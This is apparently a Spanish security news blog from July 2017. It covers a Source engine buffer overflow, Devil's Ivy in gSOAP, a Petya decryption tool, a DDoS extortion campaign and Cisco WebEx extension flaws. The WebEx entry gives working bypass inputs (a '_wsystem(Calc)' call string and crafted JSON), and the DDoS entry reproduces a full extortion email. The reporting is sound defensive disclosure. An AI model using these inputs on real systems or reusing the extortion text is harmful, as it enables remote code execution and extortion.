La vulnerabilidad se debe a una falta de comprobación de límites en la función 'nexttoken', al no controlar correctamente que el buffer 'token' pueda desbordarse. Este desbordamiento (buffer overflow) podría ser aprovechado como se puede ver en el video publicado, para ejecutar código arbitrario, ya que la función afectada es llamada por un una clase (CRagdollCollisionRulesParse) encargado de cargar datos externos de modelos Ragdoll cuando se realizan determinados eventos, por ejemplo cuando un jugador es eliminado.

Video demostrativo de la vulnerabilidad:

video



Desde Valve se han publicado las actualizaciones oportunas tanto del SDK como del cliente Steam, aunque también existes contramedidas y/o parches disponibles para los mods ya publicados, facilitadas por el investigador:

Parche disponible:
https://oneupsecuritycdn-8266.kxcdn.com/static/blog/hl2-rce/nexttoken.patch


Más información:

Remote Code Execution In Source Games
https://oneupsecurity.com/research/remote-code-execution-in-source-games

Update Released for Counter-Strike: Source, Day of Defeat: Source, Half-Life Deathmatch: Source, Half-Life 2: Deathmatch, and the Source SDK 2013 Base
http://store.steampowered.com/news/30120/


José Mesa

viernes, 21 de julio de 2017

Devil’s Ivy: Una vulnerabilidad que afecta a millones de dispositivos IoT

Sale a la luz una nueva vulnerabilidad (denominada Devil’s Ivy) que infecta a millones de dispositivos. Este fallo permite ejecutar código remoto en gran parte de los dispositivos IoT: cámaras, lectores de tarjeta, etc.

Los encargados de este descubrimiento son los investigadores de seguridad de la empresa Senrio. Según afirman estos trabajadores, encontraron el fallo analizando el firmware de una cámara Axis M3004.

La vulnerabilidad consiste en un buffer overflow, que los trabajadores de Senrio consiguieron explotar para ejecutar código remoto en la cámara arriba mencionada, tal y como podemos apreciar en el siguiente vídeo.

Demostración de Devil’s Ivy en Axis M3004 por Senrio Labs:

Devil's Ivy Exploit in Axis Security Camera from Senrio Labs on Vimeo.

Después de contactar con los distribuidores de estas cámaras (Axis Communications), la empresa les confirmó que la vulnerabilidad afectaba a unos 249 modelos diferentes de cámaras fabricadas por ellos.

La vulnerabilidad, con CVE-2017-9765 se encuentra en la librería de código abierto gSOAP (Simple Object Access Protocol).

gSOAP es un conjunto de herramientas de servicio web ampliamente usado y desarrollado por Genivia. Muchos programadores lo utilizan como parte de su software para permitir a los dispositivos comunicarse con Internet. Según Genivia, la librería ha sido descargada de su página web más de un millón de veces.


Más información:
Devil's Ivy: The Technical Details
http://blog.senr.io/devilsivy.html

Descarga del último firmware de Axis
https://www.axis.com/global/es/support/firmware

Actualización de gSOAP
https://www.genivia.com/downloads.html

Daniel Púa
dpua@hispasec.com
@arrowcode_


jueves, 20 de julio de 2017

Disponible herramienta para descifrar Petya/GoldenEye, el ransomware de la calavera

Hagamos memoria: Petya (GoldenEye siendo una de sus variantes) es un crypto-ransomware conocido desde marzo de 2016. Recordamos que un crypto-ransomware cifra archivos del usuario y pide un rescate por descifrarlos. 

La temible pantalla que anuncia el secuestro


Técnicamente, Petya se caracteriza porque su principal forma de secuestro es cifrar la MFT (índice de archivos en disco), en vez de cifrar los archivos uno a uno como habitualmente (algunas versiones de Petya también tienen esta opción). Curiosamente, más que ser conocido por la versión del autor original, es más famoso por EternalPetya, una versión pirateada (sí, se piratea malware) que afectó principalmente a Ucrania. Tuvo bastante más tirón mediático porque se sospecha que fue un ataque con motivación política.

La noticia es que para las versiones originales de Petya, el autor ha publicado su clave privada, lo que permite descifrar los archivos de las víctimas. @hsherezade, una investigadora independiente en seguridad de la información, ha publicado una herramienta que usa la clave publicada para descifrar los archivos. La herramienta está en versión beta, y como siempre se recomienda antes de intentar el descifrado, lo ideal es hacer una copia de seguridad del original cifrado por si el proceso de descifrado falla e inutiliza definitivamente nuestros archivos.

Las versiones descifrables son las siguientes:
  • Red Petya
  • Green Petya (ambas versiones)
  • GoldenEye Petya
Todas las versiones se reconocen fácilmente porque el nombre hace referencia al color del aviso que notifica la infección (rojo, verde o dorado/amarillo). Este blog detalla con capturas de pantalla cada una de las versiones comentadas, así como algunas versiones no oficiales (que no son descifrables por esta herramienta).

El enlace a la herramienta que descifra las versiones originales de Petya:

https://github.com/hasherezade/petya_key

La herramienta está publicada en código fuente, por lo que es necesario compilarla antes de usarla.



Más información:

The key to old Petya versions has been published by the malware author

Petya, un nuevo ransomware que impide el acceso al disco duro
http://unaaldia.hispasec.com/2016/03/petya-un-nuevo-ransomware-que-impide-el.html

Petya es el nuevo ransomware que causa estragos en todo el mundo


Carlos Ledesma

miércoles, 19 de julio de 2017

Los ciberdelincuentes encuentran en los ataques DDoS nuevas formas de extorsión

Durante el mes de julio se está detectando una nueva campaña de email que tienen como objetivo la extorsión a empresas mediante la amenaza de que sus equipos sufrirán un ataque en los próximos días, a no ser que reciban una cantidad de dinero en Bitcoin en la cuenta que indican los atacantes.


Los primeros ataques detectados compartían una cuenta de Bitcoin en todos los emails que enviaban, por lo que hacía pensar que, aún haciendo el pago, los atacantes no podían trazar la empresa que había procedido con el, y por consiguiente no se llevaría a cabo ningún ataque. De este ataque ya se hizo eco INCIBE a través de su web.


Pero estos nuevos intentos de extorsión que hemos detectado vienen acompañados de un ataque de DDoS previo al email y fijan una hora límite para recibir el pago, en caso contrario, procederán a llevar a cabo el ataque.


Adjuntamos correo tipo.

 De: Kadyrovtsy <Kadyrovite@protonmail.com>  
 Asunto: Ataque DDoS  
 REENVIE ESTE CORREO A QUIEN SEA IMPORTANTE EN SU EMPRESA Y TENGA PODER DE DECISION!   
   
 Somos Kadyrovtsy  
 http://lmgtfy.com/?q=Kadyrovtsy+andorra+telecom  
   
 En este mismo instante estamos iniciando un ataque de denegación de servicio en una de sus direcciones IP(XXX.XXX.XXX.XXX) Este ataque durara 10 minutos y es para que vea que somos serios.  
   
 Todos sus servidores van a ser atacados empezando este viernes {fecha}. GMT !!! Lanzaremos un nuevo ataque de denegación de servicio con una potencia de 300 Gbps, dejandole su sitio web totalmente inaccesible.  
   
 Puede detener este ataque pagando 0.5 bitcoin en la siguiente dirección bitcoin: {btc}  
   
 Si no sabe como comprar bitcoins busque en Google o adquiéralos en la empresa española Bit2me. El pago ha de recibirse antes de la fecha arriba indicada o el ataque comenzará.  
   
 Bitcoin es anónimo, nadie se enterara que su empresa ha pagado.  

Aún no sabemos si los atacantes cumplen con su amenaza en caso de no haber efectuado el pago. No obstante, el hecho de que se estén utilizando distintas cuentas de Bitcoins y de llevar a cabo un ataque con anterioridad nos induce a pensar que podrían perpetrar dicho ataque.

Quedamos a la espera de conocer más detalles y os animamos a compartir información que tengáis sobre esta forma de extorsión.

Fernando Ramírez
framirez@hispasec.com

martes, 18 de julio de 2017

Graves vulnerabilidades en la extensión de navegadores de Cisco WebEx

Cisco WebEx es un servicio de videoconferencias que cuenta con varias aplicaciones para poder interaccionar con él. Desde la aplicación de escritorio, aplicaciones móviles, web y extensiones de navegador.

Son precisamente estas últimas donde se encuentran las vulnerabilidades reportadas por Cris Neckar de Divergent Security y Tavis Ormandy de Google. Lo errores pueden llegar a producir una ejecución remota de código.


- La primera de ellas se encuentra al leer el JSON. WebEx utiliza dentro de la librería "atgpcext" un parser de JSON propio para procesar los mensajes desde el cliente.

El siguiente código muestra cómo se podría crear 2 atributos con el mismo nombre.

 var c = e.GpcExtName;  
 if (c && (c = c.trim(),  
 "atgpcext" != c.toLowerCase() && "atgpcext" != atob(c).toLowerCase().trim()))  
   return !1;  
 var d = e.GpcUnpackName;  
 if (d && (d = d.trim(),  
 "atgpcdec" != d.toLowerCase() && "atgpcdec" != atob(d).toLowerCase().trim()))  
   return !1;  
 var f = e.GpcInitCall;  
 if (f && !a.verifyScriptCall(atob(f.trim())))  

Para ello bastaría con utilizar un diccionario con el siguiente contenido:
 object={ "foo": 1, "foo\0": 2 }  
Lo cual provocaría que se crearan 2 atributos con el nombre "foo", uno con el valor 1, que sería visible por el navegador Chrome y otro con el valor 2, que sería visible por la librería "atgpcext".

- La segunda vulnerabilidad se encuentra en una expresión regular incompleta en "GpcScript". Para la interacción de WebEx con los componentes nativos del sistema se utiliza JavaScript. El siguiente código se corresponde con la función que verifica que la entrada sea correcta:

 a.verifyScriptCall = function(a) {  
   var b = /^(WebEx_|A[sT][ADEPSN]|conDll|RA[AM])|^(Ex|In)it|^(FinishC|Is[NS]|JoinM|[NM][BCS][JRUC]|Set|Name|Noti|Trans|Update)|^(td|SCSP)$/;  
   if (10240 < a.length)  
     return !1;  
   a = a.split(";");  
   for (var c = 0; c < a.length; c++) {  
     var d = a[c].trim()  
      , f = ""  
      , g = d.indexOf("=");  
     0 <= g && (d = d.substring(g + 1).trim());  
     g = d.indexOf("(");  
     0 <= g && (f = d.substring(g + 1),  
     d = d.substring(0, g).trim());  
     g = f.split(",");  
     if (1024 < f.length || 20 < g.length || 0 < d.length && !d.match(b))  
       return !1  
   }  
   return !0  
 }  

Si un atacante malicioso introdujese la entrada _wsystem(Calc)=WebEx_Exploit;, el sistema la aceptaría y funcionaría:

Esto permitiría a un atacante remoto llamar y ejecutar cualquier función exportada de cualquier librería del sistema, lo cual se traduce en una ejecución de código remoto arbitrario.

- La tercera vulnerabilidad residen en la llamada de funciones que se encuentra en lista blanca, con parámetros bajo el control del usuario.

Cualquier función que se encuentre en la lista blanca de funciones a exportar por WebEx acepta parámetros. Por ejemplo "atmccli!WebEx_AutoLaunch", la cual está permitida, pero el parámetro o parámetros son objetos controlados por el usuario. La rutina hará una llamada virtual que puede resultar en una ejecución de código arbitrario. Con el siguiente JSON se podría ejecutar código arbitrario de la dirección ObjectAddress:

 {  
   ObjectAddress: "1094795585",  
   GpcInitCall: "WebEx_AutoLaunch(ObjectAddress, ObjectAddress, ObjectAddress);"  
 }  

- La última vulnerabilidad se reside en que cualquier atacante puede actualizar a una versión anterior del plugin configurando los parámetros "GpcExtVersion" y "GpcUrlRoot". En este caso se comprueba la firma del binario, pero el atacante podría volver a una versión en la que el plugin sea vulnerable a otros ataques.


Los productos vulnerables son:
- Plugin para Google Chrome, versiones anteriores a 1.0.12
- Extensión para Mozilla Firefox, versiones anteriores a 1.0.12

Cisco recomienda actualizar los plugin de navegador y las aplicaciones de escritorio.

Más información:

Cisco Security Advisory - Cisco WebEx Browser Extension Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170717-webex

Cisco: WebEx Various GPC Sanitization bypasses permit Arbitrary Remote Command Execution
https://bugs.chromium.org/p/project-zero/issues/detail?id=1324


Antonio Sánchez